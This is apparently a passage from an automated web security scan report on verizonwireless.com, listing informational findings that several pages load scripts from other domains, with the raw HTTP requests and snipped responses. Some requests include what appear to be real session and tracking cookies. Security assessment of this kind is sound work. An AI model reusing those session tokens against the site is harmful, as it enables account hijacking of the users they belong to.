Content-Length: 6883
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                                                                                                                                                                                                <html
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</form>

           <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...

16.65. http://www.verizonwireless.com/b2c/employee/emaildomainauthentication.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/employee/emaildomainauthentication.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://scache.vzw.com/globalnav/globalnav.js?v=11-09
https://scache.vzw.com/js/shared/hbx/hbx.js
https://scache.vzw.com/js/shared/hbx/hbxFunctions.js
https://scache.vzw.com/js/shared/hbx/hbxVariables.js
https://scache.vzw.com/onlineopinionV5/oo_conf.js
https://scache.vzw.com/onlineopinionV5/oo_engine.min.js
https://scache.vzw.com/scripts/accessible/customnote.js
https://scache.vzw.com/scripts/accessible/layers.js
https://scache.vzw.com/scripts/accessible/lib.js
https://scache.vzw.com/scripts/accessible/library.js?v=11-09
https://scache.vzw.com/scripts/accessible/mootools131.js
https://scache.vzw.com/scripts/accessible/mootools131more.js
https://scache.vzw.com/scripts/homepage/swfobject.js
https://scache.vzw.com/scripts/liveperson/mtagconfig.js
https://scache.vzw.com/scripts/offermatica/mbox.js
https://scache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/employee/emaildomainauthentication.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                <html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</script>


           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.66. http://www.verizonwireless.com/b2c/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/explore/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/phonefeatures/db.js
http://cache.vzw.com/scripts/phonefeatures/populateJSONPhoneFeature.js
http://cache.vzw.com/scripts/s11.js
http://cache.vzw.com/scripts/vzw_jquery.js
http://cache.vzw.com/scripts/widgets/populateJSONWidgets.js
http://cache.vzw.com/scripts/widgets/splashPageDB.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/explore/ HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:05 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 18778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

           <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/splashPageDB.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/populateJSONWidgets.js"></script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/db.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/populateJSONPhoneFeature.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.67. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/homeLogin.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

16.68. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/homepage/vzwCarousel.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:14:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 32478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</noscript>


       <script src="http://cache.vzw.com/scripts/homepage/vzwCarousel.js" type="text/javascript"></script>
...[SNIP]...

16.69. http://www.verizonwireless.com/b2c/promo/splash/ewp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/promo/splash/ewp

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/dwr/dwrUtil.js
http://cache.vzw.com/dwr/interface/Timer.js
http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/promo/splash/ewp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="e
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...



   <script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...

16.70. http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/promotion/specialoffers.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/s11.js
http://cache.vzw.com/scripts/vzw_jquery.js

Request

GET /b2c/promotion/specialoffers.jsp HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: GLOBALID=tWRJzfV%2FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4; JSESSIONIDB2C=j6fhTlJFv6JCWtlSlB7JQG28QLChh2W1b7QTf9cVB51pQnFmLBtG!-1538644045!ozzy!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6575345525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315278932|session#1315278871714-190238#1315280732|PC#1315278871714-190238.19#1316488474; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:14:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 18728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="e
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.71. http://www.verizonwireless.com/b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/dwr/dwrUtil.js
http://cache.vzw.com/dwr/interface/Timer.js
http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY; mbox=session#1315278939788-568601#1315281120|PC#1315278939788-568601.19#1316488860|check#true#1315279320; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:36:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 15971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>

<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.72. http://www.verizonwireless.com/b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321

Issue detail

